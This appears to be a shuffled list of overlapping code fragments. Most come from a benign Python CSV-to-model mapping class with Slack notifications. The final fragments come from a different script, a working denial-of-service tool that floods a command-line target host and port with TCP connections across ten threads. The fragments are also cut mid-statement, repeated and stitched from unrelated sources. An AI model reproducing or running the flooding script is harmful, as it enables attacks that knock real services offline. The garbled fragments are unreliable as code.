"literal_eval(self.settings[key]).items()} slack_http_endpoint = self.settings['slack_http_endpoint'] # attempt to get passed in value from ENV",
"names: name_mapping[name] = self._get_clean_field_name(name) return name_mapping def _get_combined_module(self): combined_module_str = self.settings.combined_file_name[:-3] return importlib.import_module(combined_module_str)",
"def __init__(self, setup_path=None, debug=False): self.setup_path = setup_path or getattr(self, 'SETUP_PATH', None) if self.setup_path",
"clean_names_mapping: raise ValueError(f\"'{name}' field has a collision with '{clean_names_mapping[clean_name]}'. \" f\"They both produce",
"('combined_path', 'combined_file_name'), ('output_model_path', 'output_model_file')): self.settings[i] = os.path.join(self.setup_dir, self.settings[v]) # Since we cleaning up",
"clean_names_mapping = {} for name, clean_name in names_mapping.items(): if clean_name in clean_names_mapping: raise",
"for i, v in counter.most_common(10) if v > 1} if duplicates: raise ValueError(f'The",
"not self.setup_path.endswith('_setup.toml'): raise ValueError('The path needs to end with _setup.toml') self.debug = debug",
"in names_mapping.items(): if clean_name in clean_names_mapping: raise ValueError(f\"'{name}' field has a collision with",
"self.settings[item] = set(self.settings.get(item, [])) key = 'default_value_for_field_when_casting_error' self.settings[key] = self.settings.get(key) or r'{}' self.settings[key]",
"class attribute.') if not self.setup_path.endswith('_setup.toml'): raise ValueError('The path needs to end with _setup.toml')",
"passed in value if not present slack_http_endpoint = os.environ.get(slack_http_endpoint, slack_http_endpoint) self.settings['should_reprocess'] = self.settings.get('should_reprocess',",
"self.settings = Settings(**self.settings) self.questionable_fields = {} self.solid_decisions = {} self.failed_to_infer_fields = set() self.empty_fields",
"= defaultdict(list) clean_names, reader = self._get_clean_names_and_csv_data_gen(path) # transposing csv and turning into dictionary",
"getattr(self, 'SETUP_PATH', None) if self.setup_path is None: raise ValueError('setup_path needs to be passed",
"= set() def _clean_it(self, item): conv = (self.settings['field_name_part_conversion'] if isinstance(self.settings, dict) else self.settings.field_name_part_conversion)",
"cleaning_func=self._clean_it) names = next(reader) self._verify_no_duplicate_names(names) name_mapping = self._get_all_clean_field_names_mapping(names) self._verify_no_duplicate_clean_names(name_mapping) clean_names = list(name_mapping.values()) return",
"= set() self.empty_fields = set() def _clean_it(self, item): conv = (self.settings['field_name_part_conversion'] if isinstance(self.settings,",
"x: set(x.strip()) - self.settings.ignore_lines_that_include_only_subset_of, line)) def _verify_no_duplicate_names(self, names): counter = Counter(names) duplicates =",
"_get_clean_names_and_csv_data_gen(self, path): reader = read_csv_gen(path, identify_header_by_column_names=self.settings.identify_header_by_column_names, cleaning_func=self._clean_it) names = next(reader) self._verify_no_duplicate_names(names) name_mapping =",
"import os import sys import logging import importlib from ast import literal_eval from",
"= Settings(**self.settings) self.questionable_fields = {} self.solid_decisions = {} self.failed_to_infer_fields = set() self.empty_fields =",
"deepcopy from collections import defaultdict from collections import namedtuple, Counter from modelmapper.misc import",
"namedtuple('Settings', ' '.join(self.settings.keys())) self.settings = Settings(**self.settings) self.questionable_fields = {} self.solid_decisions = {} self.failed_to_infer_fields",
"list or nested lists \"\"\" if item not in self.settings: self.settings[item] = []",
"'.join(self.settings.keys())) self.settings = Settings(**self.settings) self.questionable_fields = {} self.solid_decisions = {} self.failed_to_infer_fields = set()",
"read_csv_gen, load_toml, camel_to_snake from modelmapper.slack import slack OVERRIDES_FILE_NAME = \"{}_overrides.toml\" COMBINED_FILE_NAME = \"{}_combined.py\"",
"{self._clean_it(i): v for i, v in literal_eval(self.settings[key]).items()} slack_http_endpoint = self.settings['slack_http_endpoint'] # attempt to",
"names): counter = Counter(names) duplicates = {i: v for i, v in counter.most_common(10)",
"= list(map(self._clean_it, self.settings[item])) def _get_clean_field_name(self, name): item = self._clean_it(name) for source, to_replace in",
"end with _setup.toml') self.debug = debug self.setup_dir = os.path.dirname(self.setup_path) sys.path.append(self.setup_dir) clean_later = ['field_name_full_conversion',",
"v > 1} if duplicates: raise ValueError(f'The following fields were repeated in the",
"if self.settings.slack_username and \\ self.settings.slack_channel and \\ self.settings.slack_http_endpoint: return slack( text, username=self.settings.slack_username, channel=self.settings.slack_channel,",
"self.settings[key] = self.settings.get(key) or r'{}' self.settings[key] = {self._clean_it(i): v for i, v in",
"'datetime_formats', 'ignore_lines_that_include_only_subset_of', 'ignore_fields_in_signature_calculation', 'identify_header_by_column_names'] self._original_settings = load_toml(self.setup_path)['settings'] self.settings = deepcopy(self._original_settings) for item in",
"_setup.toml') self.debug = debug self.setup_dir = os.path.dirname(self.setup_path) sys.path.append(self.setup_dir) clean_later = ['field_name_full_conversion', 'ignore_fields_in_signature_calculation', 'identify_header_by_column_names',",
"= self.settings.get(key) or r'{}' self.settings[key] = {self._clean_it(i): v for i, v in literal_eval(self.settings[key]).items()}",
"[[self._clean_it(i), self._clean_it(j)] for i, j in self.settings[item]] else: self.settings[item] = list(map(self._clean_it, self.settings[item])) def",
"i, j in self.settings[item]] else: self.settings[item] = list(map(self._clean_it, self.settings[item])) def _get_clean_field_name(self, name): item",
"def _does_line_include_data(self, line): # whether line has any characters in it that are",
"attempt to get passed in value from ENV VAR, defaulting to passed in",
"for name in names: name_mapping[name] = self._get_clean_field_name(name) return name_mapping def _get_combined_module(self): combined_module_str =",
"if self._does_line_include_data(line): for i, v in enumerate(line): try: field_name = clean_names[i] except IndexError:",
"dictionary for line in reader: if self._does_line_include_data(line): for i, v in enumerate(line): try:",
"raise ValueError('setup_path needs to be passed to init or SETUP_PATH needs to be",
"transposing csv and turning into dictionary for line in reader: if self._does_line_include_data(line): for",
"\"Please fix that and try again.\") else: if field_name not in self.settings.fields_to_be_scrubbed: result[field_name].append(v)",
"self.debug = debug self.setup_dir = os.path.dirname(self.setup_path) sys.path.append(self.setup_dir) clean_later = ['field_name_full_conversion', 'ignore_fields_in_signature_calculation', 'identify_header_by_column_names', 'fields_to_be_encrypted',",
"self.settings['overrides_file_name'] = OVERRIDES_FILE_NAME.format(identifier) self.settings['combined_file_name'] = COMBINED_FILE_NAME.format(identifier) self.settings['booleans'] = self.settings['boolean_true'] | self.settings['boolean_false'] self.settings['datetime_allowed_characters'] =",
"has a collision with '{clean_names_mapping[clean_name]}'. \" f\"They both produce '{clean_name}'\") else: clean_names_mapping[clean_name] =",
"{i: v for i, v in counter.most_common(10) if v > 1} if duplicates:",
"name_mapping = self._get_all_clean_field_names_mapping(names) self._verify_no_duplicate_clean_names(name_mapping) clean_names = list(name_mapping.values()) return clean_names, reader def _get_all_values_per_clean_name(self, path):",
"clean_name in names_mapping.items(): if clean_name in clean_names_mapping: raise ValueError(f\"'{name}' field has a collision",
"debug=False): self.setup_path = setup_path or getattr(self, 'SETUP_PATH', None) if self.setup_path is None: raise",
"and \\ self.settings.slack_channel and \\ self.settings.slack_http_endpoint: return slack( text, username=self.settings.slack_username, channel=self.settings.slack_channel, slack_http_endpoint=self.settings.slack_http_endpoint )",
"\"{}_combined.py\" class Base: logger = logging.getLogger(__name__) SETUP_PATH = None def __init__(self, setup_path=None, debug=False):",
"= OVERRIDES_FILE_NAME.format(identifier) self.settings['combined_file_name'] = COMBINED_FILE_NAME.format(identifier) self.settings['booleans'] = self.settings['boolean_true'] | self.settings['boolean_false'] self.settings['datetime_allowed_characters'] = set(self.settings['datetime_allowed_characters'])",
"literal_eval from copy import deepcopy from collections import defaultdict from collections import namedtuple,",
"self.settings[item] = list(map(self._clean_it, self.settings[item])) def _get_clean_field_name(self, name): item = self._clean_it(name) for source, to_replace",
"defaulting to passed in value if not present slack_http_endpoint = os.environ.get(slack_http_endpoint, slack_http_endpoint) self.settings['should_reprocess']",
"'fields_to_be_scrubbed'] convert_to_set = ['null_values', 'boolean_true', 'boolean_false', 'datetime_formats', 'ignore_lines_that_include_only_subset_of', 'ignore_fields_in_signature_calculation', 'identify_header_by_column_names'] self._original_settings = load_toml(self.setup_path)['settings']",
"= self.settings.get('should_reprocess', False) self.settings['slack_http_endpoint'] = slack_http_endpoint self.settings['identifier'] = identifier = os.path.basename(self.setup_path).replace('_setup.toml', '') self.settings['overrides_file_name']",
"ValueError(\"Your data might have new lines in the field names. \" \"Please fix",
"{duplicates}') def _get_clean_names_and_csv_data_gen(self, path): reader = read_csv_gen(path, identify_header_by_column_names=self.settings.identify_header_by_column_names, cleaning_func=self._clean_it) names = next(reader) self._verify_no_duplicate_names(names)",
"self._get_all_clean_field_names_mapping(names) self._verify_no_duplicate_clean_names(name_mapping) clean_names = list(name_mapping.values()) return clean_names, reader def _get_all_values_per_clean_name(self, path): result =",
"line has any characters in it that are not in ignore_lines_that_include_only_subset_of return any(filter(lambda",
"value if not present slack_http_endpoint = os.environ.get(slack_http_endpoint, slack_http_endpoint) self.settings['should_reprocess'] = self.settings.get('should_reprocess', False) self.settings['slack_http_endpoint']",
"= os.path.dirname(self.setup_path) sys.path.append(self.setup_dir) clean_later = ['field_name_full_conversion', 'ignore_fields_in_signature_calculation', 'identify_header_by_column_names', 'fields_to_be_encrypted', 'fields_to_be_scrubbed'] convert_to_set = ['null_values',",
"= camel_to_snake(item) for source, to_replace in conv: item = item.replace(source, to_replace) return item.strip('_')",
"if v > 1} if duplicates: raise ValueError(f'The following fields were repeated in",
"'boolean_false', 'datetime_formats', 'ignore_lines_that_include_only_subset_of', 'ignore_fields_in_signature_calculation', 'identify_header_by_column_names'] self._original_settings = load_toml(self.setup_path)['settings'] self.settings = deepcopy(self._original_settings) for item",
"IndexError: raise ValueError(\"Your data might have new lines in the field names. \"",
"next(reader) self._verify_no_duplicate_names(names) name_mapping = self._get_all_clean_field_names_mapping(names) self._verify_no_duplicate_clean_names(name_mapping) clean_names = list(name_mapping.values()) return clean_names, reader def",
"= COMBINED_FILE_NAME.format(identifier) self.settings['booleans'] = self.settings['boolean_true'] | self.settings['boolean_false'] self.settings['datetime_allowed_characters'] = set(self.settings['datetime_allowed_characters']) for i, v",
"if not present slack_http_endpoint = os.environ.get(slack_http_endpoint, slack_http_endpoint) self.settings['should_reprocess'] = self.settings.get('should_reprocess', False) self.settings['slack_http_endpoint'] =",
"{} self.solid_decisions = {} self.failed_to_infer_fields = set() self.empty_fields = set() def _clean_it(self, item):",
"['null_values', 'boolean_true', 'boolean_false', 'datetime_formats', 'ignore_lines_that_include_only_subset_of', 'ignore_fields_in_signature_calculation', 'identify_header_by_column_names'] self._original_settings = load_toml(self.setup_path)['settings'] self.settings = deepcopy(self._original_settings)",
"if clean_name in clean_names_mapping: raise ValueError(f\"'{name}' field has a collision with '{clean_names_mapping[clean_name]}'. \"",
"raise ValueError(f'The following fields were repeated in the csv: {duplicates}') def _get_clean_names_and_csv_data_gen(self, path):",
"from collections import defaultdict from collections import namedtuple, Counter from modelmapper.misc import read_csv_gen,",
"VAR, defaulting to passed in value if not present slack_http_endpoint = os.environ.get(slack_http_endpoint, slack_http_endpoint)",
"self.questionable_fields = {} self.solid_decisions = {} self.failed_to_infer_fields = set() self.empty_fields = set() def",
"self.solid_decisions = {} self.failed_to_infer_fields = set() self.empty_fields = set() def _clean_it(self, item): conv",
"def _verify_no_duplicate_clean_names(self, names_mapping): clean_names_mapping = {} for name, clean_name in names_mapping.items(): if clean_name",
"in enumerate(line): try: field_name = clean_names[i] except IndexError: raise ValueError(\"Your data might have",
"def _get_clean_field_name(self, name): item = self._clean_it(name) for source, to_replace in self.settings.field_name_full_conversion: if item",
"= {i: v for i, v in counter.most_common(10) if v > 1} if",
"raise ValueError(f\"'{name}' field has a collision with '{clean_names_mapping[clean_name]}'. \" f\"They both produce '{clean_name}'\")",
"return result def slack(self, text): if self.settings.slack_username and \\ self.settings.slack_channel and \\ self.settings.slack_http_endpoint:",
"clean_names = list(name_mapping.values()) return clean_names, reader def _get_all_values_per_clean_name(self, path): result = defaultdict(list) clean_names,",
"= set(self.settings['datetime_allowed_characters']) for i, v in (('overrides_path', 'overrides_file_name'), ('combined_path', 'combined_file_name'), ('output_model_path', 'output_model_file')): self.settings[i]",
"source, to_replace in conv: item = item.replace(source, to_replace) return item.strip('_') def _clean_settings_items(self, item):",
"need to be added seperately. # self.settings['field_name_part_conversion'].insert(0, ['\\n', '_']).insert(0, ['\\r\\n', '_']) _max_int =",
"ValueError(f'The following fields were repeated in the csv: {duplicates}') def _get_clean_names_and_csv_data_gen(self, path): reader",
"self.settings[v]) # Since we cleaning up the field_name_part_conversion, special characters # such as",
"item = camel_to_snake(item) for source, to_replace in conv: item = item.replace(source, to_replace) return",
"= self.settings['boolean_true'] | self.settings['boolean_false'] self.settings['datetime_allowed_characters'] = set(self.settings['datetime_allowed_characters']) for i, v in (('overrides_path', 'overrides_file_name'),",
"enumerate(line): try: field_name = clean_names[i] except IndexError: raise ValueError(\"Your data might have new",
"and try again.\") else: if field_name not in self.settings.fields_to_be_scrubbed: result[field_name].append(v) return result def",
"return any(filter(lambda x: set(x.strip()) - self.settings.ignore_lines_that_include_only_subset_of, line)) def _verify_no_duplicate_names(self, names): counter = Counter(names)",
"except IndexError: pass else: if isinstance(first_value, list): self.settings[item] = [[self._clean_it(i), self._clean_it(j)] for i,",
"= to_replace break return item def _get_all_clean_field_names_mapping(self, names): name_mapping = {} for name",
"duplicates: raise ValueError(f'The following fields were repeated in the csv: {duplicates}') def _get_clean_names_and_csv_data_gen(self,",
"combined_module_str = self.settings.combined_file_name[:-3] return importlib.import_module(combined_module_str) def _verify_no_duplicate_clean_names(self, names_mapping): clean_names_mapping = {} for name,",
"result[field_name].append(v) return result def slack(self, text): if self.settings.slack_username and \\ self.settings.slack_channel and \\",
"isinstance(first_value, list): self.settings[item] = [[self._clean_it(i), self._clean_it(j)] for i, j in self.settings[item]] else: self.settings[item]",
"camel_to_snake(item) for source, to_replace in conv: item = item.replace(source, to_replace) return item.strip('_') def",
"we cleaning up the field_name_part_conversion, special characters # such as \\n need to",
"read_csv_gen(path, identify_header_by_column_names=self.settings.identify_header_by_column_names, cleaning_func=self._clean_it) names = next(reader) self._verify_no_duplicate_names(names) name_mapping = self._get_all_clean_field_names_mapping(names) self._verify_no_duplicate_clean_names(name_mapping) clean_names =",
"= slack_http_endpoint self.settings['identifier'] = identifier = os.path.basename(self.setup_path).replace('_setup.toml', '') self.settings['overrides_file_name'] = OVERRIDES_FILE_NAME.format(identifier) self.settings['combined_file_name'] =",
"self._get_clean_field_name(name) return name_mapping def _get_combined_module(self): combined_module_str = self.settings.combined_file_name[:-3] return importlib.import_module(combined_module_str) def _verify_no_duplicate_clean_names(self, names_mapping):",
"self.settings.get(key) or r'{}' self.settings[key] = {self._clean_it(i): v for i, v in literal_eval(self.settings[key]).items()} slack_http_endpoint",
"to be a class attribute.') if not self.setup_path.endswith('_setup.toml'): raise ValueError('The path needs to",
"lists \"\"\" if item not in self.settings: self.settings[item] = [] try: first_value =",
"it that are not in ignore_lines_that_include_only_subset_of return any(filter(lambda x: set(x.strip()) - self.settings.ignore_lines_that_include_only_subset_of, line))",
"has any characters in it that are not in ignore_lines_that_include_only_subset_of return any(filter(lambda x:",
"names = next(reader) self._verify_no_duplicate_names(names) name_mapping = self._get_all_clean_field_names_mapping(names) self._verify_no_duplicate_clean_names(name_mapping) clean_names = list(name_mapping.values()) return clean_names,",
"list(map(self._clean_it, self.settings[item])) def _get_clean_field_name(self, name): item = self._clean_it(name) for source, to_replace in self.settings.field_name_full_conversion:",
"produce '{clean_name}'\") else: clean_names_mapping[clean_name] = name def _does_line_include_data(self, line): # whether line has",
"or nested lists \"\"\" if item not in self.settings: self.settings[item] = [] try:",
"if field_name not in self.settings.fields_to_be_scrubbed: result[field_name].append(v) return result def slack(self, text): if self.settings.slack_username",
"self.failed_to_infer_fields = set() self.empty_fields = set() def _clean_it(self, item): conv = (self.settings['field_name_part_conversion'] if",
"\\n need to be added seperately. # self.settings['field_name_part_conversion'].insert(0, ['\\n', '_']).insert(0, ['\\r\\n', '_']) _max_int",
"item): \"\"\" Normalizes list or nested lists \"\"\" if item not in self.settings:",
"with '{clean_names_mapping[clean_name]}'. \" f\"They both produce '{clean_name}'\") else: clean_names_mapping[clean_name] = name def _does_line_include_data(self,",
"slack_http_endpoint = os.environ.get(slack_http_endpoint, slack_http_endpoint) self.settings['should_reprocess'] = self.settings.get('should_reprocess', False) self.settings['slack_http_endpoint'] = slack_http_endpoint self.settings['identifier'] =",
"csv and turning into dictionary for line in reader: if self._does_line_include_data(line): for i,",
"name_mapping def _get_combined_module(self): combined_module_str = self.settings.combined_file_name[:-3] return importlib.import_module(combined_module_str) def _verify_no_duplicate_clean_names(self, names_mapping): clean_names_mapping =",
"int(v)) for i, v in self.settings['max_int'].items()) self.settings['max_int'] = dict(sorted(_max_int, key=lambda x: x[1])) Settings",
"= None def __init__(self, setup_path=None, debug=False): self.setup_path = setup_path or getattr(self, 'SETUP_PATH', None)",
"= setup_path or getattr(self, 'SETUP_PATH', None) if self.setup_path is None: raise ValueError('setup_path needs",
"\"\"\" Normalizes list or nested lists \"\"\" if item not in self.settings: self.settings[item]",
"self.settings.slack_username and \\ self.settings.slack_channel and \\ self.settings.slack_http_endpoint: return slack( text, username=self.settings.slack_username, channel=self.settings.slack_channel, slack_http_endpoint=self.settings.slack_http_endpoint",
"_get_all_values_per_clean_name(self, path): result = defaultdict(list) clean_names, reader = self._get_clean_names_and_csv_data_gen(path) # transposing csv and",
"to be passed to init or SETUP_PATH needs to be a class attribute.')",
"v for i, v in literal_eval(self.settings[key]).items()} slack_http_endpoint = self.settings['slack_http_endpoint'] # attempt to get",
"for i, v in literal_eval(self.settings[key]).items()} slack_http_endpoint = self.settings['slack_http_endpoint'] # attempt to get passed",
"_max_int = ((i, int(v)) for i, v in self.settings['max_int'].items()) self.settings['max_int'] = dict(sorted(_max_int, key=lambda",
"in reader: if self._does_line_include_data(line): for i, v in enumerate(line): try: field_name = clean_names[i]",
"None) if self.setup_path is None: raise ValueError('setup_path needs to be passed to init",
"= ((i, int(v)) for i, v in self.settings['max_int'].items()) self.settings['max_int'] = dict(sorted(_max_int, key=lambda x:",
"list(name_mapping.values()) return clean_names, reader def _get_all_values_per_clean_name(self, path): result = defaultdict(list) clean_names, reader =",
"= read_csv_gen(path, identify_header_by_column_names=self.settings.identify_header_by_column_names, cleaning_func=self._clean_it) names = next(reader) self._verify_no_duplicate_names(names) name_mapping = self._get_all_clean_field_names_mapping(names) self._verify_no_duplicate_clean_names(name_mapping) clean_names",
"in it that are not in ignore_lines_that_include_only_subset_of return any(filter(lambda x: set(x.strip()) - self.settings.ignore_lines_that_include_only_subset_of,",
"for name, clean_name in names_mapping.items(): if clean_name in clean_names_mapping: raise ValueError(f\"'{name}' field has",
"OVERRIDES_FILE_NAME = \"{}_overrides.toml\" COMBINED_FILE_NAME = \"{}_combined.py\" class Base: logger = logging.getLogger(__name__) SETUP_PATH =",
"1} if duplicates: raise ValueError(f'The following fields were repeated in the csv: {duplicates}')",
"needs to be a class attribute.') if not self.setup_path.endswith('_setup.toml'): raise ValueError('The path needs",
"OVERRIDES_FILE_NAME.format(identifier) self.settings['combined_file_name'] = COMBINED_FILE_NAME.format(identifier) self.settings['booleans'] = self.settings['boolean_true'] | self.settings['boolean_false'] self.settings['datetime_allowed_characters'] = set(self.settings['datetime_allowed_characters']) for",
"= self._get_all_clean_field_names_mapping(names) self._verify_no_duplicate_clean_names(name_mapping) clean_names = list(name_mapping.values()) return clean_names, reader def _get_all_values_per_clean_name(self, path): result",
"as \\n need to be added seperately. # self.settings['field_name_part_conversion'].insert(0, ['\\n', '_']).insert(0, ['\\r\\n', '_'])",
"= ['null_values', 'boolean_true', 'boolean_false', 'datetime_formats', 'ignore_lines_that_include_only_subset_of', 'ignore_fields_in_signature_calculation', 'identify_header_by_column_names'] self._original_settings = load_toml(self.setup_path)['settings'] self.settings =",
"'') self.settings['overrides_file_name'] = OVERRIDES_FILE_NAME.format(identifier) self.settings['combined_file_name'] = COMBINED_FILE_NAME.format(identifier) self.settings['booleans'] = self.settings['boolean_true'] | self.settings['boolean_false'] self.settings['datetime_allowed_characters']",
"self.settings: self.settings[item] = [] try: first_value = self.settings[item][0] except IndexError: pass else: if",
"defaultdict from collections import namedtuple, Counter from modelmapper.misc import read_csv_gen, load_toml, camel_to_snake from",
"raise ValueError(\"Your data might have new lines in the field names. \" \"Please",
"line)) def _verify_no_duplicate_names(self, names): counter = Counter(names) duplicates = {i: v for i,",
"and turning into dictionary for line in reader: if self._does_line_include_data(line): for i, v",
"SETUP_PATH needs to be a class attribute.') if not self.setup_path.endswith('_setup.toml'): raise ValueError('The path",
"_get_combined_module(self): combined_module_str = self.settings.combined_file_name[:-3] return importlib.import_module(combined_module_str) def _verify_no_duplicate_clean_names(self, names_mapping): clean_names_mapping = {} for",
"both produce '{clean_name}'\") else: clean_names_mapping[clean_name] = name def _does_line_include_data(self, line): # whether line",
"= set(self.settings.get(item, [])) key = 'default_value_for_field_when_casting_error' self.settings[key] = self.settings.get(key) or r'{}' self.settings[key] =",
"to get passed in value from ENV VAR, defaulting to passed in value",
"return importlib.import_module(combined_module_str) def _verify_no_duplicate_clean_names(self, names_mapping): clean_names_mapping = {} for name, clean_name in names_mapping.items():",
"= clean_names[i] except IndexError: raise ValueError(\"Your data might have new lines in the",
"if isinstance(first_value, list): self.settings[item] = [[self._clean_it(i), self._clean_it(j)] for i, j in self.settings[item]] else:",
"that and try again.\") else: if field_name not in self.settings.fields_to_be_scrubbed: result[field_name].append(v) return result",
"= item.replace('\\r\\n', '_').replace('\\n', '_') item = camel_to_snake(item) for source, to_replace in conv: item",
"dict(sorted(_max_int, key=lambda x: x[1])) Settings = namedtuple('Settings', ' '.join(self.settings.keys())) self.settings = Settings(**self.settings) self.questionable_fields",
"any characters in it that are not in ignore_lines_that_include_only_subset_of return any(filter(lambda x: set(x.strip())",
"the field names. \" \"Please fix that and try again.\") else: if field_name",
"for source, to_replace in self.settings.field_name_full_conversion: if item == source: item = to_replace break",
"# such as \\n need to be added seperately. # self.settings['field_name_part_conversion'].insert(0, ['\\n', '_']).insert(0,",
"any(filter(lambda x: set(x.strip()) - self.settings.ignore_lines_that_include_only_subset_of, line)) def _verify_no_duplicate_names(self, names): counter = Counter(names) duplicates",
"needs to end with _setup.toml') self.debug = debug self.setup_dir = os.path.dirname(self.setup_path) sys.path.append(self.setup_dir) clean_later",
"= self._get_clean_names_and_csv_data_gen(path) # transposing csv and turning into dictionary for line in reader:",
"reader = self._get_clean_names_and_csv_data_gen(path) # transposing csv and turning into dictionary for line in",
"modelmapper.slack import slack OVERRIDES_FILE_NAME = \"{}_overrides.toml\" COMBINED_FILE_NAME = \"{}_combined.py\" class Base: logger =",
"self.setup_dir = os.path.dirname(self.setup_path) sys.path.append(self.setup_dir) clean_later = ['field_name_full_conversion', 'ignore_fields_in_signature_calculation', 'identify_header_by_column_names', 'fields_to_be_encrypted', 'fields_to_be_scrubbed'] convert_to_set =",
"key=lambda x: x[1])) Settings = namedtuple('Settings', ' '.join(self.settings.keys())) self.settings = Settings(**self.settings) self.questionable_fields =",
"be added seperately. # self.settings['field_name_part_conversion'].insert(0, ['\\n', '_']).insert(0, ['\\r\\n', '_']) _max_int = ((i, int(v))",
"['\\n', '_']).insert(0, ['\\r\\n', '_']) _max_int = ((i, int(v)) for i, v in self.settings['max_int'].items())",
"self._does_line_include_data(line): for i, v in enumerate(line): try: field_name = clean_names[i] except IndexError: raise",
"raise ValueError('The path needs to end with _setup.toml') self.debug = debug self.setup_dir =",
"item.replace(source, to_replace) return item.strip('_') def _clean_settings_items(self, item): \"\"\" Normalizes list or nested lists",
"self.settings['booleans'] = self.settings['boolean_true'] | self.settings['boolean_false'] self.settings['datetime_allowed_characters'] = set(self.settings['datetime_allowed_characters']) for i, v in (('overrides_path',",
"self._original_settings = load_toml(self.setup_path)['settings'] self.settings = deepcopy(self._original_settings) for item in clean_later: self._clean_settings_items(item) for item",
"that are not in ignore_lines_that_include_only_subset_of return any(filter(lambda x: set(x.strip()) - self.settings.ignore_lines_that_include_only_subset_of, line)) def",
"= os.path.basename(self.setup_path).replace('_setup.toml', '') self.settings['overrides_file_name'] = OVERRIDES_FILE_NAME.format(identifier) self.settings['combined_file_name'] = COMBINED_FILE_NAME.format(identifier) self.settings['booleans'] = self.settings['boolean_true'] |",
"set(self.settings['datetime_allowed_characters']) for i, v in (('overrides_path', 'overrides_file_name'), ('combined_path', 'combined_file_name'), ('output_model_path', 'output_model_file')): self.settings[i] =",
"needs to be passed to init or SETUP_PATH needs to be a class",
"except IndexError: raise ValueError(\"Your data might have new lines in the field names.",
"collections import namedtuple, Counter from modelmapper.misc import read_csv_gen, load_toml, camel_to_snake from modelmapper.slack import",
"added seperately. # self.settings['field_name_part_conversion'].insert(0, ['\\n', '_']).insert(0, ['\\r\\n', '_']) _max_int = ((i, int(v)) for",
"again.\") else: if field_name not in self.settings.fields_to_be_scrubbed: result[field_name].append(v) return result def slack(self, text):",
"= identifier = os.path.basename(self.setup_path).replace('_setup.toml', '') self.settings['overrides_file_name'] = OVERRIDES_FILE_NAME.format(identifier) self.settings['combined_file_name'] = COMBINED_FILE_NAME.format(identifier) self.settings['booleans'] =",
"seperately. # self.settings['field_name_part_conversion'].insert(0, ['\\n', '_']).insert(0, ['\\r\\n', '_']) _max_int = ((i, int(v)) for i,",
"to_replace break return item def _get_all_clean_field_names_mapping(self, names): name_mapping = {} for name in",
"i, v in self.settings['max_int'].items()) self.settings['max_int'] = dict(sorted(_max_int, key=lambda x: x[1])) Settings = namedtuple('Settings',",
"namedtuple, Counter from modelmapper.misc import read_csv_gen, load_toml, camel_to_snake from modelmapper.slack import slack OVERRIDES_FILE_NAME",
"lines in the field names. \" \"Please fix that and try again.\") else:",
"logging import importlib from ast import literal_eval from copy import deepcopy from collections",
"be passed to init or SETUP_PATH needs to be a class attribute.') if",
"convert_to_set = ['null_values', 'boolean_true', 'boolean_false', 'datetime_formats', 'ignore_lines_that_include_only_subset_of', 'ignore_fields_in_signature_calculation', 'identify_header_by_column_names'] self._original_settings = load_toml(self.setup_path)['settings'] self.settings",
"for i, v in (('overrides_path', 'overrides_file_name'), ('combined_path', 'combined_file_name'), ('output_model_path', 'output_model_file')): self.settings[i] = os.path.join(self.setup_dir,",
"# transposing csv and turning into dictionary for line in reader: if self._does_line_include_data(line):",
"self.setup_path = setup_path or getattr(self, 'SETUP_PATH', None) if self.setup_path is None: raise ValueError('setup_path",
"name_mapping = {} for name in names: name_mapping[name] = self._get_clean_field_name(name) return name_mapping def",
"reader: if self._does_line_include_data(line): for i, v in enumerate(line): try: field_name = clean_names[i] except",
"if self.setup_path is None: raise ValueError('setup_path needs to be passed to init or"
] |
[
"Please read the code. Do not use ctrl + c and ctrl +",
"host = sys.argv[1] port = int(sys.argv[2]) def dos(d): while True: s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)",
"colorama\") end = '\\033[0m' def main(): print() if sys.argv[1] == sys.argv[1]: host =",
"while True: s = socket.socket(socket.AF_INET,socket.SOCK_STREAM) s.connect_ex((host,port)) print(f\"{Fore.RED}Packet Send To {Fore.GREEN}{host}{end}\") for i in",
"True: s = socket.socket(socket.AF_INET,socket.SOCK_STREAM) s.connect_ex((host,port)) print(f\"{Fore.RED}Packet Send To {Fore.GREEN}{host}{end}\") for i in range(10):",
"Send To {Fore.GREEN}{host}{end}\") for i in range(10): t = threading.Thread(target=dos,args=[i]) t.start() if __name__",
"the code. Do not use ctrl + c and ctrl + v (~ ̄▽ ̄)~",
"except ImportError: os.system(\"pip install colorama\") end = '\\033[0m' def main(): print() if sys.argv[1]",
"print(f\"{Fore.RED}Packet Send To {Fore.GREEN}{host}{end}\") for i in range(10): t = threading.Thread(target=dos,args=[i]) t.start() if",
"= threading.Thread(target=dos,args=[i]) t.start() if __name__ == '__main__': try: main() except (KeyboardInterrupt,EOFError): print(\"Stop...\") sys.exit()",
"= int(sys.argv[2]) def dos(d): while True: s = socket.socket(socket.AF_INET,socket.SOCK_STREAM) s.connect_ex((host,port)) print(f\"{Fore.RED}Packet Send To",
"for i in range(10): t = threading.Thread(target=dos,args=[i]) t.start() if __name__ == '__main__': try:",
"'\\033[0m' def main(): print() if sys.argv[1] == sys.argv[1]: host = sys.argv[1] port =",
"{Fore.GREEN}{host}{end}\") for i in range(10): t = threading.Thread(target=dos,args=[i]) t.start() if __name__ == '__main__':",
"and ctrl + v (~ ̄▽ ̄)~ import os,sys,socket,threading try: from colorama import Fore,init init()",
"sys.argv[1]: host = sys.argv[1] port = int(sys.argv[2]) def dos(d): while True: s =",
"range(10): t = threading.Thread(target=dos,args=[i]) t.start() if __name__ == '__main__': try: main() except (KeyboardInterrupt,EOFError):",
"int(sys.argv[2]) def dos(d): while True: s = socket.socket(socket.AF_INET,socket.SOCK_STREAM) s.connect_ex((host,port)) print(f\"{Fore.RED}Packet Send To {Fore.GREEN}{host}{end}\")",
"try: from colorama import Fore,init init() except ImportError: os.system(\"pip install colorama\") end =",
"end = '\\033[0m' def main(): print() if sys.argv[1] == sys.argv[1]: host = sys.argv[1]",
"install colorama\") end = '\\033[0m' def main(): print() if sys.argv[1] == sys.argv[1]: host",
"sys.argv[1] == sys.argv[1]: host = sys.argv[1] port = int(sys.argv[2]) def dos(d): while True:",
"t = threading.Thread(target=dos,args=[i]) t.start() if __name__ == '__main__': try: main() except (KeyboardInterrupt,EOFError): print(\"Stop...\")",
"#!/usr/bin/python3 # Please read the code. Do not use ctrl + c and",
"c and ctrl + v (~ ̄▽ ̄)~ import os,sys,socket,threading try: from colorama import Fore,init",
"dos(d): while True: s = socket.socket(socket.AF_INET,socket.SOCK_STREAM) s.connect_ex((host,port)) print(f\"{Fore.RED}Packet Send To {Fore.GREEN}{host}{end}\") for i",
"import os,sys,socket,threading try: from colorama import Fore,init init() except ImportError: os.system(\"pip install colorama\")",
